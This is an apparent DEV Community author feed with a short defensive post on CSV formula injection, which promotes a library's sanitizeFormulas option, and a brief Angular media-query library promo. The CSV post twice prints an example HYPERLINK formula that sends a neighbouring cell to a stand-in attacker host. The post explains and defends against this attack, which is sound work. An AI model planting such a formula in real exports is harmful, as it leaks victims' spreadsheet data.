The latest articles on DEV Community by Myroslav Martsin (@myroslavmartsin). https://dev.to/myroslavmartsin https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg https://dev.to/myroslavmartsin en Myroslav Martsin Thu, 18 Jun 2026 16:31:54 +0000 https://dev.to/myroslavmartsin/-16p4 https://dev.to/myroslavmartsin/-16p4 <div class="ltag__link--embedded"> <div class="crayons-story "> <a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-story__hidden-navigation-link">The CSV export vulnerability you probably have (and a one-line fix)</a> <div class="crayons-story__body crayons-story__body-full_post"> <div class="crayons-story__top"> <div class="crayons-story__meta"> <div class="crayons-story__author-pic"> <a href="/myroslavmartsin" class="crayons-avatar crayons-avatar--l "> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" alt="myroslavmartsin profile" class="crayons-avatar__image"> </a> </div> <div> <div> <a href="/myroslavmartsin" class="crayons-story__secondary fw-medium m:hidden"> Myroslav Martsin </a> <div class="profile-preview-card relative mb-4 s:mb-0 fw-medium hidden m:inline-block"> Myroslav Martsin <div id="story-author-preview-content-3934160" class="profile-preview-card__content crayons-dropdown branded-7 p-4 pt-0"> <div class="gap-4 grid"> <div class="-mt-4"> <a href="/myroslavmartsin" class="flex"> <span class="crayons-avatar crayons-avatar--xl mr-2 shrink-0"> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" class="crayons-avatar__image" alt=""> </span> <span class="crayons-link crayons-subtitle-2 mt-5">Myroslav Martsin</span> </a> </div> <div class="print-hidden"> Follow </div> <div class="author-preview-metadata-container"></div> </div> </div> </div> </div> <a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-story__tertiary fs-xs"><time>Jun 18</time><span class="time-ago-indicator-initial-placeholder"></span></a> </div> </div> </div> <div class="crayons-story__indention"> <h2 class="crayons-story__title crayons-story__title-full_post"> <a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" id="article-link-3934160"> The CSV export vulnerability you probably have (and a one-line fix) </a> </h2> <div class="crayons-story__tags"> <a class="crayons-tag crayons-tag--monochrome " href="/t/security"><span class="crayons-tag__prefix">#</span>security</a> <a class="crayons-tag crayons-tag--monochrome " href="/t/typescript"><span class="crayons-tag__prefix">#</span>typescript</a> <a class="crayons-tag crayons-tag--monochrome " href="/t/javascript"><span class="crayons-tag__prefix">#</span>javascript</a> <a class="crayons-tag crayons-tag--monochrome " href="/t/webdev"><span class="crayons-tag__prefix">#</span>webdev</a> </div> <div class="crayons-story__bottom"> <div class="crayons-story__details"> <a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left"> <div class="multiple_reactions_aggregate"> <span class="multiple_reactions_icons_container"> <span class="crayons_icon_container"> <img src="https://assets.dev.to/assets/fire-f60e7a582391810302117f987b22a8ef04a2fe0df7e3258a5f49332df1cec71e.svg" width="18" height="18"> </span> <span class="crayons_icon_container"> <img src="https://assets.dev.to/assets/multi-unicorn-b44d6f8c23cdd00964192bedc38af3e82463978aa611b4365bd33a0f1f4f3e97.svg" width="18" height="18"> </span> <span class="crayons_icon_container"> <img src="https://assets.dev.to/assets/sparkle-heart-5f9bee3767e18deb1bb725290cb151c25234768a0e9a2bd39370c382d02920cf.svg" width="18" height="18"> </span> </span> <span class="aggregate_reactions_counter">10<span class="hidden s:inline">&nbsp;reactions</span></span> </div> </a> <a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk#comments" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left flex items-center"> 7<span class="hidden s:inline">&nbsp;comments</span> </a> </div> <div class="crayons-story__save"> <small class="crayons-story__tertiary fs-xs mr-2"> 1 min read </small> <span class="bm-initial crayons-icon c-btn__icon"> </span> <span class="bm-success crayons-icon c-btn__icon"> </span> </div> </div> </div> </div> </div> </div> Myroslav Martsin Thu, 18 Jun 2026 16:30:51 +0000 https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk <p>You let users export data to CSV. They open it in a spreadsheet. A cell runs a formula. That is CSV injection, and most export endpoints have it.</p> <p>Any cell starting with <code>=</code>, <code>+</code>, <code>-</code>, <code>@</code>, a tab, or a carriage return is treated as a formula. An attacker-controlled name like <code>=HYPERLINK("http://evil.com?x="&amp;A1)</code> then runs on open and leaks a neighboring cell. The CSV is perfectly valid, so escaping commas does nothing here.</p> <p>The fix is to prefix formula-leading cells. <a href="https://github.com/martsinlabs/csv-pipe" rel="noopener noreferrer">csv-pipe</a> has it built in:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">stringify</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">csv-pipe</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">rows</span> <span class="o">=</span> <span class="p">[{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">'</span><span class="s1">=HYPERLINK("http://evil.com?x="&amp;A1)</span><span class="dl">'</span><span class="p">,</span> <span class="na">note</span><span class="p">:</span> <span class="dl">'</span><span class="s1">attacker</span><span class="dl">'</span> <span class="p">}];</span> <span class="nf">stringify</span><span class="p">(</span><span class="nx">rows</span><span class="p">,</span> <span class="p">{</span> <span class="na">sanitizeFormulas</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="c1">// name,note</span> <span class="c1">// "'=HYPERLINK(""http://evil.com?x=""&amp;A1)",attacker</span> </code></pre> </div> <p>The leading <code>'</code> makes the spreadsheet show the cell as text instead of running it (the doubled quotes are normal CSV escaping). It only touches string and array cells; numbers and dates are left alone.<br> Turn it on for any export of untrusted data.</p> <p>csv-pipe is a small, zero-dependency CSV library that encodes and parses, both directions typed and streaming, with this guard built in.</p> <ul> <li><a href="https://github.com/martsinlabs/csv-pipe" rel="noopener noreferrer">GitHub</a></li> <li><a href="https://martsinlabs.github.io/csv-pipe/" rel="noopener noreferrer">Docs</a></li> <li><a href="https://www.npmjs.com/package/csv-pipe" rel="noopener noreferrer">npm</a></li> </ul> security typescript javascript webdev Myroslav Martsin Mon, 17 Nov 2025 19:50:13 +0000 https://dev.to/myroslavmartsin/-5c4o https://dev.to/myroslavmartsin/-5c4o <div class="ltag__link"> <a href="/myroslavmartsin" class="ltag__link__link"> <div class="ltag__link__pic"> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" alt="myroslavmartsin"> </div> </a> <a href="https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig" class="ltag__link__link"> <div class="ltag__link__content"> <h2>With CSS media queries, hidden doesn’t mean inactive.</h2> <h3>Myroslav Martsin ・ Nov 14</h3> <div class="ltag__link__taglist"> <span class="ltag__link__tag">#angular</span> </div> </div> </a> </div> angular Myroslav Martsin Fri, 14 Nov 2025 21:41:07 +0000 https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig <p>The component still renders, runs lifecycles, and keeps subscriptions alive. <br> All that background logic quietly eats memory and slows your app down. </p> <p>NGX-MQ solves the problem. <br> Signal-based media queries that prevent rendering before it starts — nothing runs unless it truly matters. </p> <p>Give it a try — your app will thank you! 🚀 </p> <p>npm: <a href="https://www.npmjs.com/package/ngx-mq" rel="noopener noreferrer">https://www.npmjs.com/package/ngx-mq</a><br> GitHub: <a href="https://github.com/martsinlabs/ngx-mq" rel="noopener noreferrer">https://github.com/martsinlabs/ngx-mq</a></p> angular